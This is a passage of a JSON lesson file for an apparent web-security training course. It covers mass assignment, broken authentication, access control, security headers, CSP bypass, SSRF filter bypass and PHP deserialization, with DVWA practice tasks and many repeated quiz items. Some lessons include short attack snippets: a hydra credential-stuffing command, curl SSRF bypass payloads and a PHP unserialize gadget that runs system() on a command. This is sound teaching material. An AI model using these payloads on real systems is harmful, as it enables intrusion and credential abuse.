directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-mass-assignment","cat":"Web Application","title":"Mass Assignment Vulnerability","diff":2,"xp":150,"intro":"Send extra parameters to modify fields the developer didn't intend.","sections":[{"type":"text","content":"When frameworks auto-bind request parameters to model attributes, send role=admin or isVerified=true alongside normal registration data."},{"type":"code","lang":"bash","content":"# Normal registration:\nPOST /register\n{\"name\":\"user\",\"email\":\"u@u.com\",\"password\":\"pass\"}\n\n# Mass assignment attack:\nPOST /register\n{\"name\":\"user\",\"email\":\"u@u.com\",\"password\":\"pass\",\"role\":\"admin\",\"verified\":true}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Mass assignment exploits...","opts":["SQL queries","Framework auto-binding of request parameters to model attributes","File uploads","Session management"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-broken-auth","cat":"Web Application","title":"Broken Authentication Patterns","diff":1,"xp":75,"intro":"Common authentication flaws that let attackers bypass login.","sections":[{"type":"text","content":"Broken auth includes: credential stuffing, weak lockout policies, predictable session IDs, insecure password reset, and missing MFA."},{"type":"code","lang":"bash","content":"# Credential stuffing (reused passwords from breaches)\nhydra -l user@target.com -P breached_passwords.txt https://target.com/login\n# Session ID prediction\n# If session IDs increment: SID=1000, SID=1001...\n# Brute force: try sequential values"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Credential stuffing works because...","opts":["Passwords are encrypted","People reuse the same password across services","Authentication is strong","MFA is enabled"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-broken-access-ctrl","cat":"Web Application","title":"Broken Access Control Patterns","diff":1,"xp":75,"intro":"When users can access resources or actions they shouldn't.","sections":[{"type":"text","content":"Broken access control: horizontal (accessing another user's data), vertical (accessing admin functions), and context-dependent (skipping workflow steps)."},{"type":"code","lang":"bash","content":"# Horizontal: change user ID\nGET /api/users/123/profile -> /api/users/124/profile\n# Vertical: access admin endpoint\nGET /api/admin/users (as regular user)\n# Context: skip payment step\nGET /checkout/confirm (without going through /checkout/pay)"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Horizontal access control means...","opts":["Accessing admin functions","Accessing another user's data at the same privilege level","Skipping steps","Logging in as root"],"ans":1},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-security-headers","cat":"Web Application","title":"Security Header Analysis","diff":1,"xp":75,"intro":"Check for missing security headers in HTTP responses.","sections":[{"type":"text","content":"Missing headers create vulnerabilities: no CSP (XSS risk), no HSTS (downgrade risk), no X-Frame-Options (clickjacking), no X-Content-Type-Options (MIME sniffing)."},{"type":"code","lang":"bash","content":"curl -I https://target.com\n# Check for:\n# Content-Security-Policy (CSP) - prevents XSS\n# Strict-Transport-Security (HSTS) - prevents downgrade\n# X-Frame-Options - prevents clickjacking\n# X-Content-Type-Options: nosniff - prevents MIME sniffing\n# Referrer-Policy - controls referer leakage"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Missing HSTS header allows...","opts":["XSS","Protocol downgrade attacks (HTTPS to HTTP)","Clickjacking","SQL injection"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-csp-analysis","cat":"Web Application","title":"Content Security Policy Analysis","diff":3,"xp":200,"intro":"Evaluate and bypass Content Security Policy restrictions.","sections":[{"type":"text","content":"CSP restricts script sources. Analyze for: unsafe-inline, unsafe-eval, overly broad whitelists, JSONP endpoints on whitelisted domains, and missing directives."},{"type":"code","lang":"bash","content":"# Check CSP header\ncurl -sI https://target.com | grep -i content-security-policy\n# Analyze with Google CSP Evaluator\n# Common bypasses:\n# unsafe-inline present -> direct XSS works\n# *.google.com whitelisted -> JSONP callback bypass\n# base-uri missing -> base tag injection"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CSP 'unsafe-inline' allows...","opts":["Nothing","Inline scripts to execute (weakens XSS protection)","Only CSS","External scripts"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-ssrf-filter-bypass","cat":"Web Application","title":"SSRF Filter Bypass Techniques","diff":3,"xp":200,"intro":"Bypass SSRF protections that block internal IPs.","sections":[{"type":"text","content":"Filters blocking 127.0.0.1 and 10.x can be bypassed with: decimal IP (2130706433), IPv6 (::1), DNS rebinding, URL encoding, and redirect chains."},{"type":"code","lang":"bash","content":"# Decimal IP\ncurl 'http://target.com/fetch?url=http://2130706433'  # = 127.0.0.1\n# IPv6 shorthand\ncurl 'http://target.com/fetch?url=http://[::1]'\n# DNS rebinding\ncurl 'http://target.com/fetch?url=http://1.2.3.4.nip.io'  # resolves to 1.2.3.4\n# URL encoding\ncurl 'http://target.com/fetch?url=http://127%2e0%2e0%2e1'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"SSRF IP filters are bypassed with...","opts":["Stronger firewalls","Decimal IPs, IPv6, and DNS rebinding","Different ports","HTTPS"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-insecure-deserial-php","cat":"Web Application","title":"PHP Deserialization Attacks","diff":3,"xp":200,"intro":"Exploit PHP unserialize() for code execution.","sections":[{"type":"text","content":"When PHP unserialize() processes user input, magic methods (__destruct, __wakeup, __toString) trigger automatically on the crafted object."},{"type":"code","lang":"php","content":"<?php\n// Vulnerable:\n$data = unserialize($_COOKIE['data']);\n\n// Exploit: craft object with __destruct that executes code\nclass Exploit {\n  public $cmd = 'id';\n  function __destruct() { system($this->cmd); }\n}\necho serialize(new Exploit());\n// O:7:\"Exploit\":1:{s:3:\"cmd\";s:2:\"id\";}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"PHP magic methods triggered by unserialize include...","opts":["__init","__destruct, __wakeup, __toString","__main","__start"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening 